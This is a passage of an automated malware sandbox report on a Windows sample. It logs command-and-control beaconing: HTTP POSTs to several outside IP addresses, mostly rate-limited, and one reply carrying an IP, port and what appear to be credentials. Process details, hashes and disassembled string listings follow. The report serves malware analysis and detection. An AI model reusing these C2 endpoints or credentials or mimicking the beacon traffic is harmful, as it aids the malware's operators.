Oct 27, 2024 18:44:03.390639067 CET	334	OUT	POST / HTTP/1.1 Host: 46.8.232.106 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: QZhfAdwm Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:04.256853104 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:04 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49840	46.8.236.61	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:04.288491011 CET	333	OUT	POST / HTTP/1.1 Host: 46.8.236.61 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: TCmbxTUd Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:05.205177069 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:05 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49846	93.185.159.253	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:05.234146118 CET	336	OUT	POST / HTTP/1.1 Host: 93.185.159.253 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: jYjLIvak Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:06.118067026 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:05 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49853	91.212.166.91	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:06.146424055 CET	335	OUT	POST / HTTP/1.1 Host: 91.212.166.91 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: 7fgGo28V Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:07.088943005 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:06 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49859	188.130.206.243	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:07.118112087 CET	337	OUT	POST / HTTP/1.1 Host: 188.130.206.243 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: k1XLn9U6 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:08.246736050 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:08 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49985	46.8.232.106	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:38.281869888 CET	334	OUT	POST / HTTP/1.1 Host: 46.8.232.106 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: SkOTFD3R Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:39.251559973 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:39 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49986	46.8.236.61	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:39.278316975 CET	333	OUT	POST / HTTP/1.1 Host: 46.8.236.61 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: VfVJSseb Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:40.774508953 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:40 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests
Oct 27, 2024 18:44:40.775250912 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:40 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests
Oct 27, 2024 18:44:40.775999069 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:40 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49987	93.185.159.253	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:40.803282976 CET	336	OUT	POST / HTTP/1.1 Host: 93.185.159.253 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: iFxrj6xE Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:41.673378944 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:41 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49988	91.212.166.91	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:41.701571941 CET	335	OUT	POST / HTTP/1.1 Host: 91.212.166.91 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: XYEI81W3 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:42.640877962 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:44:42 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49989	188.130.206.243	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:44:42.674789906 CET	337	OUT	POST / HTTP/1.1 Host: 188.130.206.243 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: YMR1VdRz Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:44:47.181979895 CET	553	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 17:44:47 GMT Content-Length: 435 Content-Type: text/plain; charset=utf-8 Data Raw: 38 38 2e 32 31 38 2e 36 30 2e 35 30 3b 31 33 33 35 31 3b 68 49 39 75 74 61 6f 4c 74 76 47 44 70 73 37 73 3a 6d 34 38 2f 77 53 74 2f 56 78 58 34 34 48 67 36 32 37 75 2e 4e 41 6c 38 41 38 4e 2e 69 71 67 32 66 70 47 33 66 44 70 32 75 4b 68 2e 7a 63 78 31 31 4f 6e 30 45 4a 73 36 48 37 35 2c 53 4f 35 68 6c 73 6d 74 37 73 70 74 43 54 43 70 64 4b 51 3a 79 35 52 2f 4b 63 54 2f 64 42 62 34 58 33 49 36 75 78 68 2e 4c 30 76 38 77 4b 70 2e 57 69 42 32 57 70 73 33 70 36 62 36 6c 42 71 2e 6a 48 61 36 45 4d 46 31 41 52 34 2c 4f 61 58 68 63 7a 55 74 69 7a 4d 74 6e 57 61 70 6b 42 41 3a 53 4a 49 2f 7a 71 63 2f 51 30 6a 39 45 34 70 33 5a 5a 68 2e 54 31 65 31 55 55 6d 38 39 51 4b 35 58 58 77 2e 47 5a 51 31 42 36 6b 35 4c 4d 68 39 61 50 36 2e 62 48 71 32 76 71 78 35 31 65 54 33 65 6c 63 2c 72 7a 78 68 5a 4f 48 74 56 54 5a 74 55 44 71 70 32 6e 44 3a 4b 6f 6e 2f 79 7a 50 2f 68 4f 6a 39 42 4c 31 31 71 4f 48 2e 4e 6d 6f 32 71 54 51 31 65 77 71 32 45 57 49 2e 79 6b 33 31 30 39 78 36 6a 5a 36 36 61 43 37 2e 52 45 67 39 70 6f [TRUNCATED] Data Ascii: 88.218.60.50;13351;hI9utaoLtvGDps7s:m48/wSt/VxX44Hg627u.NAl8A8N.iqg2fpG3fDp2uKh.zcx11On0EJs6H75,SO5hlsmt7sptCTCpdKQ:y5R/KcT/dBb4X3I6uxh.L0v8wKp.WiB2Wps3p6b6lBq.jHa6EMF1AR4,OaXhczUtizMtnWapkBA:SJI/zqc/Q0j9E4p3ZZh.T1e1UUm89QK5XXw.GZQ1B6k5LMh9aP6.bHq2vqx51eT3elc,rzxhZOHtVTZtUDqp2nD:Kon/yzP/hOj9BL11qOH.Nmo2qTQ1ewq2EWI.yk3109x6jZ66aC7.REg9pom1hOR,dY9hra5tUR4tzlnpJgq:iH1/2Kx/qP31Hcm8GgF8LXA.j8t1guR3N4n0LNn.N2j2Bub0QCm6W0D.3qy2MO24XTA3dhh
Oct 27, 2024 18:45:17.191468000 CET	6	OUT	Data Raw: 00 Data Ascii:

Target ID:	0
Start time:	13:43:27
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe"
Imagebase:	0x400000
File size:	8'931'328 bytes
MD5 hash:	BDAFCAF9ECD3F3310417E90D91E3E0FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38.2%
Total number of Nodes:	34
Total number of Limit Nodes:	4

Executed Functions

Function 00414EC6 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 680
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

o, xrefs: 00415011
i, xrefs: 0041502D
r, xrefs: 004165FD
L, xrefs: 004165E8
r, xrefs: 0041503B
r, xrefs: 00415049
y, xrefs: 00415050
9HHF, xrefs: 004161CA
L, xrefs: 0041500A
a, xrefs: 00416604
a, xrefs: 004165DA
i, xrefs: 004165EF
a, xrefs: 00415018
a, xrefs: 00415042
W, xrefs: 00415057
9FK4, xrefs: 00416660
b, xrefs: 00415034
L, xrefs: 00415026
d, xrefs: 0041501F
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 9FK4$9HHF$L$L$L$L$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
API String ID: 0-3384230818
Opcode ID: 68955427dbf68eb0547421ae42c10176993060677c0034ffc2d3f8c911572dd9
Instruction ID: 0de00d26f1fb9f508684012c5907b879b538ff4cc18a3d4bb959296227bf3df1
Opcode Fuzzy Hash: 68955427dbf68eb0547421ae42c10176993060677c0034ffc2d3f8c911572dd9
Instruction Fuzzy Hash: B442F0B2D046A88BE7208B24DC44BEABB75EF81310F1440FED44D97682E67D5EC6CB56

Function 0040541D Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l, xrefs: 004060F2
i, xrefs: 004060CF
W, xrefs: 004065D3
r, xrefs: 004065B7
a, xrefs: 004065BE
y, xrefs: 004065CC
o, xrefs: 0040658D
t, xrefs: 00406123
L, xrefs: 004065A2
t, xrefs: 004060DD
a, xrefs: 00406594
r, xrefs: 00406100
L, xrefs: 00406586
t, xrefs: 0040610E
b, xrefs: 004065B0
a, xrefs: 004060EB
c, xrefs: 0040611C
e, xrefs: 00406115
P, xrefs: 004060F9
r, xrefs: 004060D6
o, xrefs: 00406107
u, xrefs: 004060E4
r, xrefs: 004065C5
d, xrefs: 0040659B
V, xrefs: 004060C8
i, xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
API String ID: 0-2457314740
Opcode ID: 3d2126126e218fe79e1625d8c6bf9eef1770de78b8e6f1eed8cfeb18f920a563
Instruction ID: d55277f9546d1a84aac084c102d29f0f5530346181b0dece6d9dd37c447b40a3
Opcode Fuzzy Hash: 3d2126126e218fe79e1625d8c6bf9eef1770de78b8e6f1eed8cfeb18f920a563
Instruction Fuzzy Hash: 2ED1F5B1D082989EF720CA24DC44BEBBB75EF91304F0441FAD44DA6282D67E1FD58B66

Function 0040609D Relevance: 47.5, APIs: 1, Strings: 26, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l, xrefs: 004060F2
i, xrefs: 004060CF
W, xrefs: 004065D3
r, xrefs: 004065B7
a, xrefs: 004065BE
y, xrefs: 004065CC
o, xrefs: 0040658D
t, xrefs: 00406123
L, xrefs: 004065A2
t, xrefs: 004060DD
a, xrefs: 00406594
r, xrefs: 00406100
L, xrefs: 00406586
t, xrefs: 0040610E
b, xrefs: 004065B0
a, xrefs: 004060EB
c, xrefs: 0040611C
e, xrefs: 00406115
P, xrefs: 004060F9
r, xrefs: 004060D6
o, xrefs: 00406107
u, xrefs: 004060E4
r, xrefs: 004065C5
d, xrefs: 0040659B
V, xrefs: 004060C8
i, xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
